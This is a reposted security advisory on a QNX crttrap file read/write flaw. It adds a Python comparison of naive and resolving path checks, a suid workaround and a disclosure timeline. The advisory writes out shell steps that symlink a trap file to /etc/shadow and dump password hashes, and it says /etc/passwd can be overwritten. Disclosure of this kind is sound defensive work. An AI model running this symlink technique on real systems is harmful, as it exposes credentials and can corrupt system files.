
[Repost] QNX Crttrap Arbitrary File Read/Write Vulnerability

Source: www.securiteam.com

Summary
crttrap is "a tool used by QNX to detect video hardware and start the correct driver for QNX". crttrap has a '-c' flag that specifies where the trap file will be written. Combined with the 'trap' flag, it is possible to read or write any file on the disk.

Credit:
The information has been provided by Julio Cesar Fort.

Details
By default crttrap writes and reads trap files found in "/etc/system/config". This directory is owned by root, so we do not have permission to write to it. The crttrap program filters "../" to prevent directory traversal vulnerabilities. However, it does not check for "/" on its own (without any dots). This makes it possible to use a subdirectory whose permissions are bound to our (non-root) group.

Once such a directory exists, we can now manipulate our trap file:
$ crttrap -c tmp/rfdslabs trap
/usr/photon/bin/devgt-iographics -dldevg-svga.so -I0 -d0x5333, 0x8c12
/usr/photon/bin/devgt-iographics -dldevg-vesabios.so -I0 -d0x5333, 0x8c12
crttrap: wrote config file as /etc/system/config/tmp/rfdslabs
$ cd /etc/system/config/tmp
$ ls -la
total 52
drwxrwxr-x 2 root 100 2048 Dec 11 12:40 .
drwxrwxr-x 3 root root 2048 Dec 11 12:35 ..
-rw-r--r-- 1 root 100 21671 Dec 11 12:40 rfdslabs

$ rm -f rfdslabs
$ ln -s /etc/shadow rfdslabs
$ crttrap -c tmp/rfdslabs dump
root:21QjUKxP9gEJK:0:0:0
sandimas:91UzHxvt3x1n2:0:0:0

We are also able to overwrite any file with 'trap' switch. As an example, an attacker can corrupt '/etc/passwd' and make login attempts fail every time.
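The root cause described above is a path check that rejects only the literal "../" substring, which says nothing about symlinks or subdirectory paths that resolve elsewhere. The following is an added illustration, not code from the advisory or from QNX: it places the naive substring filter beside a confinement check that resolves the candidate path (symlinks included) and requires the result to stay inside the configured directory. The directory layout is constructed in a temporary directory to mirror the advisory's "tmp/rfdslabs" symlink case; the names are assumptions.

```python
import os
import shutil
import tempfile


def naive_filter_ok(user_path: str) -> bool:
    """The weak check the advisory describes: only reject a literal '../'."""
    return "../" not in user_path


def confined_path(base_dir: str, user_path: str):
    """Hardened check: join to the base, resolve symlinks and '..', and
    require the resolved path to remain strictly inside the base directory.
    Returns the resolved path on success, None on rejection."""
    base_real = os.path.realpath(base_dir)
    # os.path.join discards base_dir if user_path is absolute, so the
    # containment check below is what actually enforces the boundary.
    candidate = os.path.realpath(os.path.join(base_real, user_path))
    if candidate == base_real:
        return None
    if os.path.commonpath([base_real, candidate]) != base_real:
        return None
    return candidate


def build_sandbox():
    """Constructed layout (hypothetical names): <root>/config stands in for
    /etc/system/config, config/tmp is a writable subdirectory, and
    config/tmp/rfdslabs is a symlink pointing at a file outside the base."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "config")
    os.makedirs(os.path.join(base, "tmp"))
    secret = os.path.join(root, "shadow")  # constructed stand-in for a protected file
    with open(secret, "w") as f:
        f.write("root:HASHPLACEHOLDER:0:0:0\n")
    os.symlink(secret, os.path.join(base, "tmp", "rfdslabs"))
    return root, base, secret


def demo():
    """Run both checks over representative inputs.
    Returns {label: (naive_accepts, confined_accepts)}."""
    root, base, secret = build_sandbox()
    try:
        cases = {
            "tmp/rfdslabs": "tmp/rfdslabs",   # symlink escaping the base
            "../shadow": "../shadow",         # classic traversal
            "tmp/legit": "tmp/legit",         # legitimate file inside the base
            "absolute": secret,               # absolute path, no dots at all
        }
        results = {}
        for label, rel in cases.items():
            results[label] = (
                naive_filter_ok(rel),
                confined_path(base, rel) is not None,
            )
        return results
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for label, (naive_ok, confined_ok) in demo().items():
        print(f"{label:14} naive={naive_ok!s:5} confined={confined_ok}")
```

The naive filter accepts both the symlink path and the absolute path, exactly the two inputs that leave the directory; the confinement check rejects them because it decides on the resolved location rather than on the spelling of the input. A privileged program should additionally avoid following symlinks at open time (for example by refusing to write through a path whose parent is writable by an unprivileged group), since a symlink can be swapped in between the check and the open.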

PS: On 31 May 2002, Simon Oullette found a bug in the crttrap '-c' flag in QNX 4.25. His exploitation technique does not work against the newest versions, because crttrap now only opens files under "/etc/system/config" and its subdirectories.

Workaround:
We suggest that you remove crttrap's suid bit until QNX releases a patch.

Timeline:
10 Dec 2004: Vulnerability detected
11 Dec 2004: Advisory written; rfdslabs contacts QNX
20 Dec 2004: QNX replies to rfdslabs
28 Dec 2004: Advisory released to public